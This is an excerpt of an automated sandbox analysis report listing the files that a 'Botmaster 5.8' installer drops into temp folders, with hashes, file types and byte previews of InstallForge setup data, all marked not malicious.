                                                                                                                                                                                                                SHA-512:268D1CD05527D178C9A5B51EEB1AEC4C2837823A088915D05B40A140791367ED569DACD222C901617CACC2B8E81DC4A988E1D512162BBDF415C660A91D5FE30E
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:<installpath>\BotMaster.exe..Bot Master....<installpath>\BotMaster.exe..0..

                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\IF{0E375487-F438-46CC-BEFB-A232FC480193}\Image_Left.jpg

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exe
                                                                                                                                                                                                                File Type:PC bitmap, Windows 3.x format, 164 x 314 x 8, image size 51496, cbSize 52574, bits offset 1078
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):52574
                                                                                                                                                                                                                Entropy (8bit):3.0903761385512687
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:384:4BEdMSd1XtGxVej7fSXgWuZThHUfL1y80X/NisaihUzgsQYEq82FMoXZXzJzyoVw:xC01XtGSDr6puPnhicedJAGo9xScd7
                                                                                                                                                                                                                MD5:D4C6925A72BB9F71A5A9BC8FE2022F9B
                                                                                                                                                                                                                SHA1:AF89965F896BD744A8DB922DEE58BE9248603B6D
                                                                                                                                                                                                                SHA-256:C5D0EA0D4E4CCA82C72045AE40D0FFB68C6E9DE6304C3DFAA17D99FAB03E47E5
                                                                                                                                                                                                                SHA-512:303FC0D8FFACD8B4179112CF5B1143840826E629FF3583BBFC21ACE940D4468057E0472246C855118967A16A2CE5067D884DD31CEE24B7A489B6E82E1BD70ED2
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:BM^.......6...(.......:...........(.......................3...f................3..33..f3...3...3...3...f..3f..ff...f...f...f......3...f..................3...f...................3...f.................3.3.3.f.3...3...3...3..33.333.f33..33..33..33..f3.3f3.ff3..f3..f3..f3...3.3.3.f.3...3..3...3...3.3.3.f.3...3...3...3...3.3.3.f.3...3...3...3...f.3.f.f.f...f...f...f..3f.33f.f3f..3f..3f..3f..ff.3ff.fff..ff..ff..ff...f.3.f.f.f...f..f...f...f.3.f.f.f...f...f...f...f.3.f.f.f...f...f...f.........3...f................3..33..f3...3...3...3...f..3f..ff...f...f...f......3...f.................3..f...............3...f.......................3...f................3..33..f3...3...3...3...f..3f..ff...f...f...f......3...f..................3...f...................3...f...................3...f................3..33..f3...3...3...3...f..3f..ff...f...f...f......3...f..................3...f...................3...f.........................................................................................

                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\IF{0E375487-F438-46CC-BEFB-A232FC480193}\Image_Top.jpg

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exe
                                                                                                                                                                                                                File Type:PC bitmap, Windows 3.x format, 55 x 55 x 8, image size 3080, cbSize 4158, bits offset 1078
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):4158
                                                                                                                                                                                                                Entropy (8bit):5.5650658856515
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:96:tTvuA1NlwGt6tzZe+6HWjKQR+jtuFWHKiw0zY:lvpt6bAH0zYjtun0E
                                                                                                                                                                                                                MD5:4AE65BA99FB788D962860EC9ED14F2A7
                                                                                                                                                                                                                SHA1:9D89FC4DF5CB45232C4F6B514855DE723D5B4809
                                                                                                                                                                                                                SHA-256:6D118DC765ED52458079F8F588B7E144B02AA8E564F06726AADE9CA7D77EF0A3
                                                                                                                                                                                                                SHA-512:A5D593F69F38E9907628B0AB8ECB7FF79AF0C8A0223B3FAD7D9ED7361FC3F202F16A13280EBC52587E616206E3AEF641E6A0294A7E574321A2CE41BAB9871A9E
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:BM>.......6...(...7...7...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................M...F...A...X...=...2...:...`...X...]..B...+l..zj..Rg..[.....|...y...v...}...q..v..z..{...j...f..o..n..j..w..e...[...Q...Z...G..T...y...p...f...;...5...%...,..8..........................u.M.t.E.g.<.Z.2.J.0.R.).>.!.2.'.;.5.2...$.............................'...U.A..~~..yy..{{..zz..ut..rr..uf..on..rr..tt..|z..ml..gg..ff..n

                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\IF{0E375487-F438-46CC-BEFB-A232FC480193}\OS.dat

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exe
                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):189
                                                                                                                                                                                                                Entropy (8bit):4.373765379459472
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3:jBJUVVVFY31J+1jyf1J1AyF4ovf1Jwfvf1J1AyFzyf1JRiuo31JeFYnvf1JXvo90:jBJU/Vi33+xyf3BKyf3wHf3BByf3Va3L
                                                                                                                                                                                                                MD5:34C275EE1F7992EA61B44D72C8ED6DB5
                                                                                                                                                                                                                SHA1:24FEF4EAE09F8BC04F9AA8916538A0B05D520C61
                                                                                                                                                                                                                SHA-256:8819195120405611C3FCFF1FB1DB3AB0BA10370A5CAD6DA249158327B1A457D3
                                                                                                                                                                                                                SHA-512:FFCFF890C5419E9BBFA02984C28B1E01A6E5E9B38B23DE5C2FDBE8B11E37AFBD9DA7E8B4E525FD5B8D9EF42D48670C69DD63CC1628A7759857772DCB24AA1806
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:Windows 2000 = 1..Windows XP = 1..Windows Server 2003 = 1..Windows Vista = 1..Windows Server 2008 = 1..Windows 7 = 1..Windows 8 = 1..Windows 10 = 1..Windows Server 2016 = 1..NoOSCheck = 0..

                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\IF{0E375487-F438-46CC-BEFB-A232FC480193}\SC.dat

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exe
                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):617
                                                                                                                                                                                                                Entropy (8bit):4.979018643483574
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:12:zoKR7C7RUddIiXRQsthXWSS4s1XFPX/U0XtNmK1MkE/hkCqGmtEU:zoKR7aEe0bpWSShx/xtNH1MkE/hkCXgD
                                                                                                                                                                                                                MD5:0B21A5C4921A2785A5F2CCD2BF87078E
                                                                                                                                                                                                                SHA1:253C557996593926C5FD4C953AA332B82C1588BB
                                                                                                                                                                                                                SHA-256:2598290D1C4B8681A0372D9A3F43700D18181C1242A643FF316A8A1E32B293BF
                                                                                                                                                                                                                SHA-512:95FDE939C67BABD44AAB836B75EEF57483811A13A2F0BEE34DCCBFE94CB035767FE437785B22F3B444776CF22B82DAC737E9836DB253247D5E6A5DB3CFD5CD92
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:[Setup]..Appname = Bot Master..Version = 5.8..Licence = 0..ChangeApplicationFolder = 1..ChangeStartMenuFolder = 0..Desktopicon = 1..Allow_Desktopicons = 1..Allow_StartMenuFolder = 1..label = 1..InstallDir = <programfiles>\<company>\<appname>\..StartMenuFolder = 0..Addition = 2..ProgramRun = <installpath>\BotMaster.exe..ProgramRunArguments = ..Languages = 1..ShortcutFolder = <company>\<appname>\..Uninstaller = 1..UninstallerFilename = Uninstall..Uninstaller_VW = 0..Website = ..serials = 0..Serialcheck = 0..SplashScreen = 0..SPS_Time = 2..Company = Bot Master..TotalSize = 14.1 MB..Website1 = ..SFA = 0..DFA = 0..

                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\IF{0E375487-F438-46CC-BEFB-A232FC480193}\Setup.cab

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exe
                                                                                                                                                                                                                File Type:Microsoft Cabinet archive data, many, 10508 bytes, 7 files, at 0x2c "SC.dat" "Desktop.dat", ID 12345, number 1, 2 datablocks, 0x1 compression
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):10508
                                                                                                                                                                                                                Entropy (8bit):7.9591525913668395
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:192:lQQNrFWwfoM349aGmRXEjP+wKL1S+wdWgO3LzPYuBUyero:/NAwfJYaGCukLM+wwgO3L0ENero
                                                                                                                                                                                                                MD5:546D45BBBC4F0A01C821ACA07CF3D386
                                                                                                                                                                                                                SHA1:2D31E127034D32A1AF45C3688F86EEE79152C0C2
                                                                                                                                                                                                                SHA-256:5E302CD6842EB6A17A1E6748ADAF886DEDA0FA5EAD37E0372FE22628F3758C6F
                                                                                                                                                                                                                SHA-512:ACB806869C789C07B9D558441BC89EAE205908EF305AF8F877D009BD8A876B66F8893239F7DEB4B51AB4ED4329A7E62AC3A7FE2327EBC98BE746A7B8C2B96D74
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:MSCF.....)......,...............90..........i...............SC.dat.K...i...........Desktop.dat.................OS.dat.....q...........default.ifl.^.../...........Image_Left.jpg.>...............Image_Top.jpg.|...............licence.rtf.N.A:M...CK.\.n.6...eD..V..{..v..M.n......l.l.N....@.K. ...H.'}.....Az......?.H....;m....3.D.....C.?.E........b..G....<...I.-...."..gP.../...&.h6&....g..4....q..U...h.'.'..p.>.f.....U..N...1...=.N...D,o.....q4e_..4.N...S./...Ex.O.Q......E8{..B..?mce..NN&)....9..%.}...q..g...x.:...H..`q.<.f)i=@.._.......|...i.Hu...g.....C...U....~x...2:N&iD.D.I8M.#.c|.._.i.....Q4.%.^.........V.....&?...~......z.]....|../. ...\J.7.../...;w.0...?..C....pa ..a.O.]..|./....w4.....x6...F..O>:..y.......1.SR...t:I..).O(.....N..'...4..@e_L.i....OU.^....4J...Y.6}...%...0.!h....8~.J....6~<.AkX...W-...+c....A..qt.~{A..!..g......J.....i...?..W.p...4.F........?a.>.......O.9.j^...,Q..l|..]...w..|..2..'...B./..K'3..=...L(.....ES0.......S_....{..F...i.O

                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\IF{0E375487-F438-46CC-BEFB-A232FC480193}\default.ifl

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exe
                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):3006
                                                                                                                                                                                                                Entropy (8bit):4.906329518650122
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:48:KSH5mNWUm8/7UzY8Dmwwn0VYNv7TO4L/kpLlpfX9+XD/Vyx2IBGG+KX2ihd8rdpF:bZhUP/7UURn55Tf/ipX9+XrVmRtX38
                                                                                                                                                                                                                MD5:DC51022CF78C9B519F2058983A773119
                                                                                                                                                                                                                SHA1:56BF6AAE50122301617CDAA7C5002C38FA1571A1
                                                                                                                                                                                                                SHA-256:93E28A5125B4864773F53D1C5F87C1756EFA0C2D60D5C3FD6B34AA920080F568
                                                                                                                                                                                                                SHA-512:DFAC8474BF7724B000A530B76152F75E146AE490D7F3D1F4960247226663EF738C88000A2B3C033BF626348DB4B33D7B26E0202B840052D80FF6C36BB8E089AA
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview://(C) 2006 Forgesoft..//English language file for InstallForge.....[Main]..Title=<appname> Setup....[Gadgets]..NextBtn = Next >..CancelBtn = Cancel..BackBtn = < Back..FinishBtn = Finish..BrowseBtn = Browse.....AcceptOptn = I accept the agreement..DoNotAcceptOptn = I do not accept the agreement..CreateDesktopIconCbx = Create desktop icon..CreateStartMenuFolderCbx = Create start menu folder..LaunchProgramCbx = Launch..RebootCbx = Reboot computer now..DestinationFolderFR3 = Destination Folder..SelAppFolder=Select Application Folder:..SelStartMenuFolder=Select Start Menu Folder:....[Messages]..ExitSetupH = Exit Setup..ExitSetup = Do you want to abort the installation?..CouldNotExtractFileH = Error..CouldNotExtractFile = Could not extract file!....[Start]..Title = Welcome to the <appname> Setup Wizard..Text = This will install <appname> <appversion> on your computer. It is recommended that you close all other applications before continuing. Click Next to continue.....[LicenceAgreement]..Hea

                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\IF{0E375487-F438-46CC-BEFB-A232FC480193}\icon.dat

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exe
                                                                                                                                                                                                                File Type:MS Windows icon resource - 9 icons, 48x48, 16 colors, 4 bits/pixel, 32x32, 16 colors, 4 bits/pixel
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):25214
                                                                                                                                                                                                                Entropy (8bit):5.835474441553232
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:384:0dAfBqLXaIkeASzZ0oK78hUZZZgYa8IFDAcVraGFIdcTtwbMZ:0dawLXaIkjkqkhUZZZ3DIrd7RibM
                                                                                                                                                                                                                MD5:FA63A0160B9FF05DC70CFBCA82B465B6
                                                                                                                                                                                                                SHA1:0493E1DA3943D27A4A96071F914B9ED01E9C0DAA
                                                                                                                                                                                                                SHA-256:D3A14188ECCD7761CD20CE86237F481A4BCDDFFCD460871BD7B4504F6162D9DA
                                                                                                                                                                                                                SHA-512:496A7610857E77CB6CC6140D82DDCC975C6CFCF63FD3995D2C9A4B6ACCAF150CDB49686867A99EA1441B8D1C70224E95327C326979E22F11ED31838D92C6C699
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:......00......h....... ......................(.......00.............. ......................h...^"..00.... ..%...'.. .... .....nM........ .h....^..(...0...`...........................................................................................................................ww.....................xx.wwp......www..............ww....x...w.......x.......ww.......w................~.......p..............x..................w....x.........p........""'xw...................""""z..................."""'z...........p......."""'............p.......**"'......................"g....................**"x......................"x.....p..............**"x..................~....x....................*..x..................~....x.....p.x.............w..................~....w........................................~....w............p...........x...........p.....~.......................~.......................~......x.........p......~..n...................~.......w.......p.......~nnnnnnngx............

                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\IF{0E375487-F438-46CC-BEFB-A232FC480193}\licence.rtf

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exe
                                                                                                                                                                                                                File Type:Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1033
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):124
                                                                                                                                                                                                                Entropy (8bit):4.834602545781737
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3:gOz4RJXDVWiFRcz7eVFMALMezbOGU5YB5DVALXA2n:L4VXFRcz6DqWR5JkQ2
                                                                                                                                                                                                                MD5:969D154352C0FAFB84B27B8CAF22D504
                                                                                                                                                                                                                SHA1:1E1C45A31C159DE7824332BBB95134663733F3BF
                                                                                                                                                                                                                SHA-256:CFEEE7E71A82187371519F9A0C232FACF5E82889C2E4AE7BB57532E09A5C30C0
                                                                                                                                                                                                                SHA-512:B38B5759DB705A0808F2A4BFC3135613607B78795A2D216ABDA06DAB0CE1BA8F7D56412B6B5319CB07066CE6E6BD181F940949CBBB99C27DB02C36A7807B6835
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:{\rtf1\ansi\ansicpg1252\deff0\deflang1033{\fonttbl{\f0\fnil\fcharset0 MS Shell Dlg;}}..\viewkind4\uc1\pard\f0\fs17\par..}...

                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\IF{61B3A18B-036C-4C0C-B838-28845BC299F0}\Desktop.dat

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exe
                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):75
                                                                                                                                                                                                                Entropy (8bit):4.197209073300621
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3:YWi14jZY6xA4vXyU4jZY6E:YWicZY69XsZY6E
                                                                                                                                                                                                                MD5:F97AF9F76317A164E194D2ADB9A79F4A
                                                                                                                                                                                                                SHA1:A793EF80CA4620916FB0FF938A61C087E0794B75
                                                                                                                                                                                                                SHA-256:E96B37868F42BE735C6D9CD8FE937C154E3D93DC43A653DBCD1200937B6C1918
                                                                                                                                                                                                                SHA-512:268D1CD05527D178C9A5B51EEB1AEC4C2837823A088915D05B40A140791367ED569DACD222C901617CACC2B8E81DC4A988E1D512162BBDF415C660A91D5FE30E
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:<installpath>\BotMaster.exe..Bot Master....<installpath>\BotMaster.exe..0..

                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\IF{61B3A18B-036C-4C0C-B838-28845BC299F0}\Image_Left.jpg

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exe
                                                                                                                                                                                                                File Type:PC bitmap, Windows 3.x format, 164 x 314 x 8, image size 51496, cbSize 52574, bits offset 1078
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):52574
                                                                                                                                                                                                                Entropy (8bit):3.0903761385512687
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:384:4BEdMSd1XtGxVej7fSXgWuZThHUfL1y80X/NisaihUzgsQYEq82FMoXZXzJzyoVw:xC01XtGSDr6puPnhicedJAGo9xScd7
                                                                                                                                                                                                                MD5:D4C6925A72BB9F71A5A9BC8FE2022F9B
                                                                                                                                                                                                                SHA1:AF89965F896BD744A8DB922DEE58BE9248603B6D
                                                                                                                                                                                                                SHA-256:C5D0EA0D4E4CCA82C72045AE40D0FFB68C6E9DE6304C3DFAA17D99FAB03E47E5
                                                                                                                                                                                                                SHA-512:303FC0D8FFACD8B4179112CF5B1143840826E629FF3583BBFC21ACE940D4468057E0472246C855118967A16A2CE5067D884DD31CEE24B7A489B6E82E1BD70ED2
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:BM^.......6...(.......:...........(.......................3...f................3..33..f3...3...3...3...f..3f..ff...f...f...f......3...f..................3...f...................3...f.................3.3.3.f.3...3...3...3..33.333.f33..33..33..33..f3.3f3.ff3..f3..f3..f3...3.3.3.f.3...3..3...3...3.3.3.f.3...3...3...3...3.3.3.f.3...3...3...3...f.3.f.f.f...f...f...f..3f.33f.f3f..3f..3f..3f..ff.3ff.fff..ff..ff..ff...f.3.f.f.f...f..f...f...f.3.f.f.f...f...f...f...f.3.f.f.f...f...f...f.........3...f................3..33..f3...3...3...3...f..3f..ff...f...f...f......3...f.................3..f...............3...f.......................3...f................3..33..f3...3...3...3...f..3f..ff...f...f...f......3...f..................3...f...................3...f...................3...f................3..33..f3...3...3...3...f..3f..ff...f...f...f......3...f..................3...f...................3...f.........................................................................................

                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\IF{61B3A18B-036C-4C0C-B838-28845BC299F0}\Image_Top.jpg

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exe
                                                                                                                                                                                                                File Type:PC bitmap, Windows 3.x format, 55 x 55 x 8, image size 3080, cbSize 4158, bits offset 1078
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):4158
                                                                                                                                                                                                                Entropy (8bit):5.5650658856515
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:96:tTvuA1NlwGt6tzZe+6HWjKQR+jtuFWHKiw0zY:lvpt6bAH0zYjtun0E
                                                                                                                                                                                                                MD5:4AE65BA99FB788D962860EC9ED14F2A7
                                                                                                                                                                                                                SHA1:9D89FC4DF5CB45232C4F6B514855DE723D5B4809
                                                                                                                                                                                                                SHA-256:6D118DC765ED52458079F8F588B7E144B02AA8E564F06726AADE9CA7D77EF0A3
                                                                                                                                                                                                                SHA-512:A5D593F69F38E9907628B0AB8ECB7FF79AF0C8A0223B3FAD7D9ED7361FC3F202F16A13280EBC52587E616206E3AEF641E6A0294A7E574321A2CE41BAB9871A9E
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:BM>.......6...(...7...7...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................M...F...A...X...=...2...:...`...X...]..B...+l..zj..Rg..[.....|...y...v...}...q..v..z..{...j...f..o..n..j..w..e...[...Q...Z...G..T...y...p...f...;...5...%...,..8..........................u.M.t.E.g.<.Z.2.J.0.R.).>.!.2.'.;.5.2...$.............................'...U.A..~~..yy..{{..zz..ut..rr..uf..on..rr..tt..|z..ml..gg..ff..n

                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\IF{61B3A18B-036C-4C0C-B838-28845BC299F0}\OS.dat

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exe
                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):189
                                                                                                                                                                                                                Entropy (8bit):4.373765379459472
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3:jBJUVVVFY31J+1jyf1J1AyF4ovf1Jwfvf1J1AyFzyf1JRiuo31JeFYnvf1JXvo90:jBJU/Vi33+xyf3BKyf3wHf3BByf3Va3L
                                                                                                                                                                                                                MD5:34C275EE1F7992EA61B44D72C8ED6DB5
                                                                                                                                                                                                                SHA1:24FEF4EAE09F8BC04F9AA8916538A0B05D520C61
                                                                                                                                                                                                                SHA-256:8819195120405611C3FCFF1FB1DB3AB0BA10370A5CAD6DA249158327B1A457D3
                                                                                                                                                                                                                SHA-512:FFCFF890C5419E9BBFA02984C28B1E01A6E5E9B38B23DE5C2FDBE8B11E37AFBD9DA7E8B4E525FD5B8D9EF42D48670C69DD63CC1628A7759857772DCB24AA1806
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:Windows 2000 = 1..Windows XP = 1..Windows Server 2003 = 1..Windows Vista = 1..Windows Server 2008 = 1..Windows 7 = 1..Windows 8 = 1..Windows 10 = 1..Windows Server 2016 = 1..NoOSCheck = 0..

                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\IF{61B3A18B-036C-4C0C-B838-28845BC299F0}\SC.dat

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exe
                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):617
                                                                                                                                                                                                                Entropy (8bit):4.979018643483574
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:12:zoKR7C7RUddIiXRQsthXWSS4s1XFPX/U0XtNmK1MkE/hkCqGmtEU:zoKR7aEe0bpWSShx/xtNH1MkE/hkCXgD
                                                                                                                                                                                                                MD5:0B21A5C4921A2785A5F2CCD2BF87078E
                                                                                                                                                                                                                SHA1:253C557996593926C5FD4C953AA332B82C1588BB
                                                                                                                                                                                                                SHA-256:2598290D1C4B8681A0372D9A3F43700D18181C1242A643FF316A8A1E32B293BF
                                                                                                                                                                                                                SHA-512:95FDE939C67BABD44AAB836B75EEF57483811A13A2F0BEE34DCCBFE94CB035767FE437785B22F3B444776CF22B82DAC737E9836DB253247D5E6A5DB3CFD5CD92
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:[Setup]..Appname = Bot Master..Version = 5.8..Licence = 0..ChangeApplicationFolder = 1..ChangeStartMenuFolder = 0..Desktopicon = 1..Allow_Desktopicons = 1..Allow_StartMenuFolder = 1..label = 1..InstallDir = <programfiles>\<company>\<appname>\..StartMenuFolder = 0..Addition = 2..ProgramRun = <installpath>\BotMaster.exe..ProgramRunArguments = ..Languages = 1..ShortcutFolder = <company>\<appname>\..Uninstaller = 1..UninstallerFilename = Uninstall..Uninstaller_VW = 0..Website = ..serials = 0..Serialcheck = 0..SplashScreen = 0..SPS_Time = 2..Company = Bot Master..TotalSize = 14.1 MB..Website1 = ..SFA = 0..DFA = 0..

                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\IF{61B3A18B-036C-4C0C-B838-28845BC299F0}\Setup.cab

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exe
                                                                                                                                                                                                                File Type:Microsoft Cabinet archive data, many, 10508 bytes, 7 files, at 0x2c "SC.dat" "Desktop.dat", ID 12345, number 1, 2 datablocks, 0x1 compression
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):10508
                                                                                                                                                                                                                Entropy (8bit):7.9591525913668395
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:192:lQQNrFWwfoM349aGmRXEjP+wKL1S+wdWgO3LzPYuBUyero:/NAwfJYaGCukLM+wwgO3L0ENero
                                                                                                                                                                                                                MD5:546D45BBBC4F0A01C821ACA07CF3D386
                                                                                                                                                                                                                SHA1:2D31E127034D32A1AF45C3688F86EEE79152C0C2
                                                                                                                                                                                                                SHA-256:5E302CD6842EB6A17A1E6748ADAF886DEDA0FA5EAD37E0372FE22628F3758C6F
                                                                                                                                                                                                                SHA-512:ACB806869C789C07B9D558441BC89EAE205908EF305AF8F877D009BD8A876B66F8893239F7DEB4B51AB4ED4329A7E62AC3A7FE2327EBC98BE746A7B8C2B96D74
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:MSCF.....)......,...............90..........i...............SC.dat.K...i...........Desktop.dat.................OS.dat.....q...........default.ifl.^.../...........Image_Left.jpg.>...............Image_Top.jpg.|...............licence.rtf.N.A:M...CK.\.n.6...eD..V..{..v..M.n......l.l.N....@.K. ...H.'}.....Az......?.H....;m....3.D.....C.?.E........b..G....<...I.-...."..gP.../...&.h6&....g..4....q..U...h.'.'..p.>.f.....U..N...1...=.N...D,o.....q4e_..4.N...S./...Ex.O.Q......E8{..B..?mce..NN&)....9..%.}...q..g...x.:...H..`q.<.f)i=@.._.......|...i.Hu...g.....C...U....~x...2:N&iD.D.I8M.#.c|.._.i.....Q4.%.^.........V.....&?...~......z.]....|../. ...\J.7.../...;w.0...?..C....pa ..a.O.]..|./....w4.....x6...F..O>:..y.......1.SR...t:I..).O(.....N..'...4..@e_L.i....OU.^....4J...Y.6}...%...0.!h....8~.J....6~<.AkX...W-...+c....A..qt.~{A..!..g......J.....i...?..W.p...4.F........?a.>.......O.9.j^...,Q..l|..]...w..|..2..'...B./..K'3..=...L(.....ES0.......S_....{..F...i.O

                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\IF{61B3A18B-036C-4C0C-B838-28845BC299F0}\default.ifl

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exe
                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):3006
                                                                                                                                                                                                                Entropy (8bit):4.906329518650122
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:48:KSH5mNWUm8/7UzY8Dmwwn0VYNv7TO4L/kpLlpfX9+XD/Vyx2IBGG+KX2ihd8rdpF:bZhUP/7UURn55Tf/ipX9+XrVmRtX38
                                                                                                                                                                                                                MD5:DC51022CF78C9B519F2058983A773119
                                                                                                                                                                                                                SHA1:56BF6AAE50122301617CDAA7C5002C38FA1571A1
                                                                                                                                                                                                                SHA-256:93E28A5125B4864773F53D1C5F87C1756EFA0C2D60D5C3FD6B34AA920080F568
                                                                                                                                                                                                                SHA-512:DFAC8474BF7724B000A530B76152F75E146AE490D7F3D1F4960247226663EF738C88000A2B3C033BF626348DB4B33D7B26E0202B840052D80FF6C36BB8E089AA
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview://(C) 2006 Forgesoft..//English language file for InstallForge.....[Main]..Title=<appname> Setup....[Gadgets]..NextBtn = Next >..CancelBtn = Cancel..BackBtn = < Back..FinishBtn = Finish..BrowseBtn = Browse.....AcceptOptn = I accept the agreement..DoNotAcceptOptn = I do not accept the agreement..CreateDesktopIconCbx = Create desktop icon..CreateStartMenuFolderCbx = Create start menu folder..LaunchProgramCbx = Launch..RebootCbx = Reboot computer now..DestinationFolderFR3 = Destination Folder..SelAppFolder=Select Application Folder:..SelStartMenuFolder=Select Start Menu Folder:....[Messages]..ExitSetupH = Exit Setup..ExitSetup = Do you want to abort the installation?..CouldNotExtractFileH = Error..CouldNotExtractFile = Could not extract file!....[Start]..Title = Welcome to the <appname> Setup Wizard..Text = This will install <appname> <appversion> on your computer. It is recommended that you close all other applications before continuing. Click Next to continue.....[LicenceAgreement]..Hea

                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\IF{61B3A18B-036C-4C0C-B838-28845BC299F0}\icon.dat

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exe
